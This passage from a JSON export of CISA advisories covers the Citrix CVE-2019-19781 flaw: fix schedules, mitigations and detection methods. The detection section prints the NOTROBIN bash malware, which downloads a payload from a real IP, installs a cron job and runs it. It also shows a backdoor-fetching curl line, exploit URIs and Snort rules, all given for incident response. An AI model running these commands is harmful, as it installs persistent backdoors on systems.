vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020. ](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30. 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:14:28", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigations steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA releases a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released blog post on CVE-2019-19781 with timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15] ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).** Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability ](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785 ](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability ](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability ](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:14:22", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running under the `nobody `user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname & curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the Process ID from the PS output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context: **Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>_ _\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. \n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting 